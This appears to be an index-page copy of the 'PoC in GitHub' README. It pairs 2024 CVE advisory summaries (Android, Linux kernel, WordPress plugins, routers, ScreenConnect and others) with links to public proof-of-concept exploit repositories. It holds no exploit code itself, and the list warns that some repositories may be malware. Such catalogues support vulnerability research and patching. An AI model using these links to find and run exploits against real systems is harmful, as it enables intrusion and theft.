Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

https://github.com/nomi-sec/PoC-in-GitHub

📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.
cve exploit poc security vulnerability

Last synced: about 1 month ago

README

# PoC in GitHub

## 2024
### CVE-2024-0015 (2024-02-16)

In convertToComponentName of DreamService.java, there is a possible way to launch arbitrary protected activities due to intent redirection. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.

- [UmVfX1BvaW50/CVE-2024-0015](https://github.com/UmVfX1BvaW50/CVE-2024-0015)

### CVE-2024-0023 (2024-02-16)

In ConvertRGBToPlanarYUV of Codec2BufferUtils.cpp, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [AbrarKhan/G3_Frameworks_av_CVE-2024-0023](https://github.com/AbrarKhan/G3_Frameworks_av_CVE-2024-0023)
- [Aakashmom/frameworks_av_android10_r33_CVE-2024-0023](https://github.com/Aakashmom/frameworks_av_android10_r33_CVE-2024-0023)

### CVE-2024-0030 (2024-02-16)

In btif_to_bta_response of btif_gatt_util.cc, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

- [uthrasri/system_bt_CVE-2024-0030](https://github.com/uthrasri/system_bt_CVE-2024-0030)

### CVE-2024-0039 (2024-03-11)

In attp_build_value_cmd of att_protocol.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.

- [41yn14/CVE-2024-0039-Exploit](https://github.com/41yn14/CVE-2024-0039-Exploit)

### CVE-2024-0040 (2024-02-16)

In setParameter of MtpPacket.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0040](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0040)
- [uthrasri/frameworks_av_CVE-2024-0040](https://github.com/uthrasri/frameworks_av_CVE-2024-0040)

### CVE-2024-0044 (2024-03-11)

In createSessionInternal of PackageInstallerService.java, there is a possible run-as any app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [scs-labrat/android_autorooter](https://github.com/scs-labrat/android_autorooter)
- [pl4int3xt/cve_2024_0044](https://github.com/pl4int3xt/cve_2024_0044)
- [Re13orn/CVE-2024-0044-EXP](https://github.com/Re13orn/CVE-2024-0044-EXP)
- [007CRIPTOGRAFIA/c-CVE-2024-0044](https://github.com/007CRIPTOGRAFIA/c-CVE-2024-0044)
- [Kai2er/CVE-2024-0044-EXP](https://github.com/Kai2er/CVE-2024-0044-EXP)
- [hunter24x24/cve_2024_0044](https://github.com/hunter24x24/cve_2024_0044)
- [nexussecelite/EvilDroid](https://github.com/nexussecelite/EvilDroid)
- [nahid0x1/CVE-2024-0044](https://github.com/nahid0x1/CVE-2024-0044)
- [MrW0l05zyn/cve-2024-0044](https://github.com/MrW0l05zyn/cve-2024-0044)
- [canyie/CVE-2024-0044](https://github.com/canyie/CVE-2024-0044)

### CVE-2024-0049 (2024-03-11)

In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0049](https://github.com/nidhihcl75/frameworks_av_AOSP10_r33_CVE-2024-0049)
- [Aakashmom/frameworks_av_android10_r33_CVE-2024-0049](https://github.com/Aakashmom/frameworks_av_android10_r33_CVE-2024-0049)

### CVE-2024-0195 (2024-01-02)

A vulnerability was found in spider-flow 0.4.3. It has been classified as critical. It affects the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. Manipulation with unknown data leads to a code injection vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [Cappricio-Securities/CVE-2024-0195](https://github.com/Cappricio-Securities/CVE-2024-0195)
- [fa-rrel/CVE-2024-0195-SpiderFlow](https://github.com/fa-rrel/CVE-2024-0195-SpiderFlow)
- [MuhammadWaseem29/CVE-2024-0195-SpiderFlow](https://github.com/MuhammadWaseem29/CVE-2024-0195-SpiderFlow)
- [hack-with-rohit/CVE-2024-0195-SpiderFlow](https://github.com/hack-with-rohit/CVE-2024-0195-SpiderFlow)

### CVE-2024-0197 (2024-02-27)

A flaw in the installer for Thales SafeNet Sentinel HASP LDK prior to 9.16 on Windows allows an attacker to escalate their privilege level via local access.

- [ewilded/CVE-2024-0197-POC](https://github.com/ewilded/CVE-2024-0197-POC)

### CVE-2024-0204 (2024-01-22)

Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.

- [horizon3ai/CVE-2024-0204](https://github.com/horizon3ai/CVE-2024-0204)
- [cbeek-r7/CVE-2024-0204](https://github.com/cbeek-r7/CVE-2024-0204)
- [m-cetin/CVE-2024-0204](https://github.com/m-cetin/CVE-2024-0204)
- [adminlove520/CVE-2024-0204](https://github.com/adminlove520/CVE-2024-0204)

### CVE-2024-0230 (2024-01-12)

A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic.

- [keldnorman/cve-2024-0230-blue](https://github.com/keldnorman/cve-2024-0230-blue)

### CVE-2024-0235 (2024-01-16)

The EventON WordPress plugin before 4.5.5 and the EventON WordPress plugin before 2.2.7 do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve the email addresses of any users on the blog.

- [Cappricio-Securities/CVE-2024-0235](https://github.com/Cappricio-Securities/CVE-2024-0235)

### CVE-2024-0305 (2024-01-08)

A vulnerability was found in Guangzhou Yingke Electronic Technology Ncast up to 2017. It has been rated as problematic. This affects an unknown part of the file /manage/IPSetup.php of the component Guest Login. Manipulation with unknown data leads to an information disclosure vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [jidle123/cve-2024-0305exp](https://github.com/jidle123/cve-2024-0305exp)

### CVE-2024-0311 (2024-03-14)

A malicious insider can bypass the existing policy of Skyhigh Client Proxy without a valid release code.

- [calligraf0/CVE-2024-0311](https://github.com/calligraf0/CVE-2024-0311)

### CVE-2024-0324 (2024-02-05)

The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles.

- [kodaichodai/CVE-2024-0324](https://github.com/kodaichodai/CVE-2024-0324)

### CVE-2024-0352 (2024-01-09)

A vulnerability was discovered in Likeshop up to 2.5.7.20210311. It has been classified as critical. It concerns the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. Manipulation of the argument file with unknown data leads to an unrestricted upload vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [Cappricio-Securities/CVE-2024-0352](https://github.com/Cappricio-Securities/CVE-2024-0352)

### CVE-2024-0379 (2024-02-20)

The Custom Twitter Feeds – A Tweets Widget or X Feed Widget plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2.1. This is due to missing or incorrect nonce validation on the ctf_auto_save_tokens function. This makes it possible for unauthenticated attackers to update the site's twitter API token and secret via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

- [kodaichodai/CVE-2024-0379](https://github.com/kodaichodai/CVE-2024-0379)

### CVE-2024-0399 (2024-04-15)

The WooCommerce Customers Manager WordPress plugin before 29.7 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role.

- [xbz0n/CVE-2024-0399](https://github.com/xbz0n/CVE-2024-0399)

### CVE-2024-0507 (2024-01-16)

An attacker with access to a Management Console user account with the editor role could escalate privileges through a command injection vulnerability in the Management Console. This vulnerability affected all versions of GitHub Enterprise Server and was fixed in versions 3.11.3, 3.10.5, 3.9.8, and 3.8.13. This vulnerability was reported via the GitHub Bug Bounty program.

- [convisolabs/CVE-2024-0507_CVE-2024-0200-github](https://github.com/convisolabs/CVE-2024-0507_CVE-2024-0200-github)

### CVE-2024-0509 (2024-02-05)

The WP 404 Auto Redirect to Similar Post plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘request’ parameter in all versions up to, and including, 1.0.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

- [kodaichodai/CVE-2024-0509](https://github.com/kodaichodai/CVE-2024-0509)

### CVE-2024-0566 (2024-02-12)

The Smart Manager WordPress plugin before 8.28.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.

- [xbz0n/CVE-2024-0566](https://github.com/xbz0n/CVE-2024-0566)

### CVE-2024-0582 (2024-01-16)

A memory leak flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then frees it. This flaw allows a local user to crash or potentially escalate their privileges on the system.

- [ysanatomic/io_uring_LPE-CVE-2024-0582](https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582)
- [Forsaken0129/CVE-2024-0582](https://github.com/Forsaken0129/CVE-2024-0582)
- [0ptyx/cve-2024-0582](https://github.com/0ptyx/cve-2024-0582)
- [geniuszlyy/CVE-2024-0582](https://github.com/geniuszlyy/CVE-2024-0582)

### CVE-2024-0588 (2024-04-09)

The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.10. This is due to missing nonce validation on the pmpro_lifter_save_streamline_option() function. This makes it possible for unauthenticated attackers to enable the streamline setting with Lifter LMS via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

- [kodaichodai/CVE-2024-0588](https://github.com/kodaichodai/CVE-2024-0588)

### CVE-2024-0590 (2024-02-20)

The Microsoft Clarity plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the edit_clarity_project_id() function. This makes it possible for unauthenticated attackers to change the project id and add malicious JavaScript via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

- [kodaichodai/CVE-2024-0590](https://github.com/kodaichodai/CVE-2024-0590)

### CVE-2024-0623 (2024-01-20)

The VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

- [kodaichodai/CVE-2024-0623](https://github.com/kodaichodai/CVE-2024-0623)

### CVE-2024-0624 (2024-01-25)

The Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.12.7. This is due to missing or incorrect nonce validation on the pmpro_update_level_order() function. This makes it possible for unauthenticated attackers to update the order of levels via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

- [kodaichodai/CVE-2024-0624](https://github.com/kodaichodai/CVE-2024-0624)

### CVE-2024-0679 (2024-01-20)

The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.

- [RandomRobbieBF/CVE-2024-0679](https://github.com/RandomRobbieBF/CVE-2024-0679)

### CVE-2024-0684 (2024-02-06)

A flaw was found in the GNU coreutils "split" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service.

- [Valentin-Metz/writeup_split](https://github.com/Valentin-Metz/writeup_split)

### CVE-2024-0710 (2024-05-02)

The GP Unique ID plugin for WordPress is vulnerable to Unique ID Modification in all versions up to, and including, 1.5.5. This is due to insufficient input validation. This makes it possible for unauthenticated attackers to tamper with the generation of a unique ID on a form submission and replace the generated unique ID with a user-controlled one, leading to a loss of integrity in cases where the ID's uniqueness is relied upon in a security-specific context.

- [karlemilnikka/CVE-2024-0710](https://github.com/karlemilnikka/CVE-2024-0710)

### CVE-2024-0713

- [kitodd/CVE-2024-0713](https://github.com/kitodd/CVE-2024-0713)

### CVE-2024-0741 (2024-01-23)

An out of bounds write in ANGLE could have allowed an attacker to corrupt memory leading to a potentially exploitable crash. This vulnerability affects Firefox < 122, Firefox ESR < 115.7, and Thunderbird < 115.7.

- [HyHy100/Firefox-ANGLE-CVE-2024-0741](https://github.com/HyHy100/Firefox-ANGLE-CVE-2024-0741)

### CVE-2024-0757 (2024-06-04)

The Insert or Embed Articulate Content into WordPress plugin through 4.3000000023 does not properly filter which file extensions are allowed to be imported on the server, allowing the upload of malicious code within zip files.

- [hunThubSpace/CVE-2024-0757-Exploit](https://github.com/hunThubSpace/CVE-2024-0757-Exploit)

### CVE-2024-0762 (2024-05-14)

Potential buffer overflow in unsafe UEFI variable handling in Phoenix SecureCore™ for select Intel platforms. This issue affects:

- Phoenix SecureCore™ for Intel Kaby Lake: from 4.0.1.1 before 4.0.1.998;
- Phoenix SecureCore™ for Intel Coffee Lake: from 4.1.0.1 before 4.1.0.562;
- Phoenix SecureCore™ for Intel Ice Lake: from 4.2.0.1 before 4.2.0.323;
- Phoenix SecureCore™ for Intel Comet Lake: from 4.2.1.1 before 4.2.1.287;
- Phoenix SecureCore™ for Intel Tiger Lake: from 4.3.0.1 before 4.3.0.236;
- Phoenix SecureCore™ for Intel Jasper Lake: from 4.3.1.1 before 4.3.1.184;
- Phoenix SecureCore™ for Intel Alder Lake: from 4.4.0.1 before 4.4.0.269;
- Phoenix SecureCore™ for Intel Raptor Lake: from 4.5.0.1 before 4.5.0.218;
- Phoenix SecureCore™ for Intel Meteor Lake: from 4.5.1.1 before 4.5.1.15.

- [tadash10/Detect-CVE-2024-0762](https://github.com/tadash10/Detect-CVE-2024-0762)

### CVE-2024-0783 (2024-01-22)

A critical vulnerability was found in Project Worlds Online Admission System 1.0. This concerns an unknown function of the file documents.php. Manipulation with unknown data leads to an unrestricted upload vulnerability. The attack can be carried out over the network. The exploit is publicly available.

- [keru6k/Online-Admission-System-RCE-PoC](https://github.com/keru6k/Online-Admission-System-RCE-PoC)

### CVE-2024-0944 (2024-01-26)

A problematic vulnerability was identified in Totolink T8 4.1.5cu.833_20220905. Affected is an unknown process of the file /cgi-bin/cstecgi.cgi. Manipulation with unknown data leads to a session expiration vulnerability. The attack can be carried out over the network. The complexity of an attack is rather high and it is difficult to exploit. The exploit is publicly available.

- [Artemisxxx37/cve-2024-0944](https://github.com/Artemisxxx37/cve-2024-0944)

### CVE-2024-0986 (2024-01-28)

A vulnerability was identified in Issabel PBX 4.0.0. It has been classified as critical. It concerns an unspecified function of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. Manipulation of the argument Command with unknown data leads to an os command injection vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated](https://github.com/gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated)

### CVE-2024-1071 (2024-03-13)

The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [gbrsh/CVE-2024-1071](https://github.com/gbrsh/CVE-2024-1071)
- [Trackflaw/CVE-2024-1071-Docker](https://github.com/Trackflaw/CVE-2024-1071-Docker)
- [Matrexdz/CVE-2024-1071](https://github.com/Matrexdz/CVE-2024-1071)
- [Matrexdz/CVE-2024-1071-Docker](https://github.com/Matrexdz/CVE-2024-1071-Docker)
- [fa-rrel/CVE-2024-1071-SQL-Injection](https://github.com/fa-rrel/CVE-2024-1071-SQL-Injection)
- [Dogu589/WordPress-Exploit-CVE-2024-1071](https://github.com/Dogu589/WordPress-Exploit-CVE-2024-1071)

### CVE-2024-1086 (2024-01-31)

A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.

The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.

We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.

- [Notselwyn/CVE-2024-1086](https://github.com/Notselwyn/CVE-2024-1086)
- [Alicey0719/docker-POC_CVE-2024-1086](https://github.com/Alicey0719/docker-POC_CVE-2024-1086)
- [CCIEVoice2009/CVE-2024-1086](https://github.com/CCIEVoice2009/CVE-2024-1086)
- [kevcooper/CVE-2024-1086-checker](https://github.com/kevcooper/CVE-2024-1086-checker)
- [feely666/CVE-2024-1086](https://github.com/feely666/CVE-2024-1086)
- [xzx482/CVE-2024-1086](https://github.com/xzx482/CVE-2024-1086)
- [matrixvk/CVE-2024-1086-aarch64](https://github.com/matrixvk/CVE-2024-1086-aarch64)

### CVE-2024-1112 (2024-01-31)

Heap-based buffer overflow vulnerability in Resource Hacker, developed by Angus Johnson, affecting version 3.6.0.92. This vulnerability could allow an attacker to execute arbitrary code via a long filename argument.

- [enessakircolak/CVE-2024-1112](https://github.com/enessakircolak/CVE-2024-1112)

### CVE-2024-1207 (2024-02-08)

The WP Booking Calendar plugin for WordPress is vulnerable to SQL Injection via the 'calendar_request_params[dates_ddmmyy_csv]' parameter in all versions up to, and including, 9.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [sahar042/CVE-2024-1207](https://github.com/sahar042/CVE-2024-1207)

### CVE-2024-1208 (2024-02-05)

The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.

- [karlemilnikka/CVE-2024-1208-and-CVE-2024-1210](https://github.com/karlemilnikka/CVE-2024-1208-and-CVE-2024-1210)
- [Cappricio-Securities/CVE-2024-1208](https://github.com/Cappricio-Securities/CVE-2024-1208)

### CVE-2024-1209 (2024-02-05)

The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.

- [karlemilnikka/CVE-2024-1209](https://github.com/karlemilnikka/CVE-2024-1209)

### CVE-2024-1212 (2024-02-21)

Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.

- [Chocapikk/CVE-2024-1212](https://github.com/Chocapikk/CVE-2024-1212)
- [nak000/CVE-2024-1212](https://github.com/nak000/CVE-2024-1212)

### CVE-2024-1269 (2024-02-07)

A problematic vulnerability was found in SourceCodester Product Management System 1.0. Affected is an unknown processing of the file /supplier.php. Manipulation of the argument supplier_name/supplier_contact with unknown data leads to a cross site scripting vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [sajaljat/CVE-2024-1269](https://github.com/sajaljat/CVE-2024-1269)

### CVE-2024-1301 (2024-03-12)

SQL injection vulnerability in Badger Meter Monitool affecting versions 4.6.3 and earlier. A remote attacker could send a specially crafted SQL query to the server via the j_username parameter and retrieve the information stored in the database.

- [guillermogm4/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection](https://github.com/guillermogm4/CVE-2024-1301---Badgermeter-moni-tool-SQL-Injection)

### CVE-2024-1302 (2024-03-12)

Information exposure vulnerability in Badger Meter Monitool affecting versions up to 4.6.3 and earlier. A local attacker could change the application's file parameter to a log file obtaining all sensitive information such as database credentials.

- [guillermogm4/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure](https://github.com/guillermogm4/CVE-2024-1302---Badgermeter-moni-tool-Sensitive-information-exposure)

### CVE-2024-1303 (2024-03-12)

Incorrectly limiting the path to a restricted directory vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows an authenticated attacker to retrieve any file from the device using the download-file functionality.

- [guillermogm4/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal](https://github.com/guillermogm4/CVE-2024-1303---Badgermeter-moni-tool-Path-Traversal)

### CVE-2024-1304 (2024-03-12)

Cross-site scripting vulnerability in Badger Meter Monitool that affects versions up to 4.6.3 and earlier. This vulnerability allows a remote attacker to send a specially crafted javascript payload to an authenticated user and partially hijack their browser session.

- [guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS](https://github.com/guillermogm4/CVE-2024-1304---Badgermeter-moni-tool-Reflected-Cross-Site-Scripting-XSS)

### CVE-2024-1346 (2024-02-19)

Weak MySQL database root password in LaborOfficeFree affects version 19.10. This vulnerability allows an attacker to calculate the root password of the MySQL database used by LaborOfficeFree using two constants.

- [PeterGabaldon/CVE-2024-1346](https://github.com/PeterGabaldon/CVE-2024-1346)

### CVE-2024-1380 (2024-03-13)

The Relevanssi – A Better Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relevanssi_export_log_check() function in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. The vendor has indicated that they may look into adding a capability check for proper authorization control, however, this vulnerability is theoretically patched as is.

- [RandomRobbieBF/CVE-2024-1380](https://github.com/RandomRobbieBF/CVE-2024-1380)

### CVE-2024-1403 (2024-02-27)

In OpenEdge Authentication Gateway and AdminServer prior to 11.7.19, 12.2.14, 12.8.1 on all platforms supported by the OpenEdge product, an authentication bypass vulnerability has been identified. The vulnerability is a bypass to authentication based on a failure to properly handle username and password. Certain unexpected content passed into the credentials can lead to unauthorized access without proper authentication.

- [horizon3ai/CVE-2024-1403](https://github.com/horizon3ai/CVE-2024-1403)

### CVE-2024-1441 (2024-03-11)

An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash.

- [almkuznetsov/CVE-2024-1441](https://github.com/almkuznetsov/CVE-2024-1441)

### CVE-2024-1512 (2024-02-17)

The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [rat-c/CVE-2024-1512](https://github.com/rat-c/CVE-2024-1512)

### CVE-2024-1561 (2024-04-16)

An issue was discovered in gradio-app/gradio, where the `/component_server` endpoint improperly allows the invocation of any method on a `Component` class with attacker-controlled arguments. Specifically, by exploiting the `move_resource_to_block_cache()` method of the `Block` class, an attacker can copy any file on the filesystem to a temporary directory and subsequently retrieve it. This vulnerability enables unauthorized local file read access, posing a significant risk especially when the application is exposed to the internet via `launch(share=True)`, thereby allowing remote attackers to read files on the host machine. Furthermore, gradio apps hosted on `huggingface.co` are also affected, potentially leading to the exposure of sensitive information such as API keys and credentials stored in environment variables.

- [DiabloHTB/CVE-2024-1561](https://github.com/DiabloHTB/CVE-2024-1561)
- [DiabloHTB/Nuclei-Template-CVE-2024-1561](https://github.com/DiabloHTB/Nuclei-Template-CVE-2024-1561)

### CVE-2024-1651 (2024-02-19)

Torrentpier version 2.4.1 allows executing arbitrary commands on the server.

This is possible because the application is vulnerable to insecure deserialization.

- [sharpicx/CVE-2024-1651-PoC](https://github.com/sharpicx/CVE-2024-1651-PoC)
- [hy011121/CVE-2024-1651-exploit-RCE](https://github.com/hy011121/CVE-2024-1651-exploit-RCE)
- [Whiteh4tWolf/CVE-2024-1651-PoC](https://github.com/Whiteh4tWolf/CVE-2024-1651-PoC)

### CVE-2024-1655 (2024-04-15)

Certain ASUS WiFi router models have an OS Command Injection vulnerability, allowing an authenticated remote attacker to execute arbitrary system commands by sending a specially crafted request.

- [lnversed/CVE-2024-1655](https://github.com/lnversed/CVE-2024-1655)

### CVE-2024-1698 (2024-02-27)

The NotificationX – Best FOMO, Social Proof, WooCommerce Sales Popup & Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [kamranhasan/CVE-2024-1698-Exploit](https://github.com/kamranhasan/CVE-2024-1698-Exploit)
- [shanglyu/CVE-2024-1698](https://github.com/shanglyu/CVE-2024-1698)

### CVE-2024-1709 (2024-02-21)

ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.

- [W01fh4cker/ScreenConnect-AuthBypass-RCE](https://github.com/W01fh4cker/ScreenConnect-AuthBypass-RCE)
- [HussainFathy/CVE-2024-1709](https://github.com/HussainFathy/CVE-2024-1709)
- [sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass](https://github.com/sxyrxyy/CVE-2024-1709-ConnectWise-ScreenConnect-Authentication-Bypass)
- [cjybao/CVE-2024-1709-and-CVE-2024-1708](https://github.com/cjybao/CVE-2024-1709-and-CVE-2024-1708)
- [AhmedMansour93/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-](https://github.com/AhmedMansour93/Event-ID-229-Rule-Name-SOC262-CVE-2024-1709-)
- [AMRICHASFUCK/Mass-CVE-2024-1709](https://github.com/AMRICHASFUCK/Mass-CVE-2024-1709)

### CVE-2024-1781 (2024-02-23)

A vulnerability was identified in Totolink X6000R AX3000 9.4.0cu.852_20230719. It has been classified as critical. Affected is the function setWizardCfg of the file /cgi-bin/cstecgi.cgi of the component shttpd. Manipulation with unknown data leads to a command injection vulnerability. The exploit is publicly available.

- [Icycu123/CVE-2024-1781](https://github.com/Icycu123/CVE-2024-1781)

### CVE-2024-1874 (2024-04-29)

In PHP versions 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, when using proc_open() command with array syntax, due to insufficient escaping, if the arguments of the executed command are controlled by a malicious user, the user can supply arguments that would execute arbitrary commands in Windows shell.

- [ox1111/-CVE-2024-1874-](https://github.com/ox1111/-CVE-2024-1874-)
- [Tgcohce/CVE-2024-1874](https://github.com/Tgcohce/CVE-2024-1874)

### CVE-2024-1931 (2024-03-07)

NLnet Labs Unbound version 1.18.0 up to and including version 1.19.1 contain a vulnerability that can cause denial of service by a certain code path that can lead to an infinite loop. Unbound 1.18.0 introduced a feature that removes EDE records from responses with size higher than the client's advertised buffer size. Before removing all the EDE records however, it would try to see if trimming the extra text fields on those records would result in an acceptable size while still retaining the EDE codes. Due to an unchecked condition, the code that trims the text of the EDE records could loop indefinitely. This happens when Unbound would reply with attached EDE information on a positive reply and the client's buffer size is smaller than the needed space to include EDE records. The vulnerability can only be triggered when the 'ede: yes' option is used; non default configuration. From version 1.19.2 on, the code is fixed to avoid looping indefinitely.

- [passer12/CVE-2024-1931-reproduction](https://github.com/passer12/CVE-2024-1931-reproduction)

### CVE-2024-1939 (2024-02-29)

Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

- [rycbar77/CVE-2024-1939](https://github.com/rycbar77/CVE-2024-1939)

### CVE-2024-2054 (2024-03-05)

The Artica-Proxy administrative web application will deserialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.

- [Madan301/CVE-2024-2054](https://github.com/Madan301/CVE-2024-2054)

### CVE-2024-2074 (2024-03-01)

A critical vulnerability was found in Mini-Tmall up to 20231017. It affects an unknown function of the file ?r=tmall/admin/user/1/1. Manipulation of the argument orderBy with unknown data can exploit a SQL injection vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [yuziiiiiiiiii/CVE-2024-2074](https://github.com/yuziiiiiiiiii/CVE-2024-2074)

### CVE-2024-2169 (2024-03-19)

Implementations of UDP application protocols are vulnerable to network loops. An unauthenticated attacker can use maliciously crafted packets against a vulnerable implementation, which can lead to Denial of Service (DoS) and/or abuse of resources.

- [douglasbuzatto/G3-Loop-DoS](https://github.com/douglasbuzatto/G3-Loop-DoS)

### CVE-2024-2188 (2024-03-05)

Stored Cross-Site Scripting (XSS) vulnerability in TP-Link Archer AX50 affecting firmware version 1.0.11 build 2022052. This vulnerability could allow an unauthenticated attacker to create a port mapping rule via a SOAP request and store a malicious JavaScript payload within that rule, which could result in execution of the JavaScript payload when the rule is loaded.

- [hacefresko/CVE-2024-2188](https://github.com/hacefresko/CVE-2024-2188)

### CVE-2024-2193 (2024-03-15)

A Speculative Race Condition (SRC) vulnerability that impacts modern CPU architectures supporting speculative execution (related to Spectre V1) has been disclosed. An unauthenticated attacker can exploit this vulnerability to disclose arbitrary data from the CPU using race conditions to access the speculative executable code paths.

- [uthrasri/CVE-2024-2193](https://github.com/uthrasri/CVE-2024-2193)

### CVE-2024-2257 (2024-05-10)

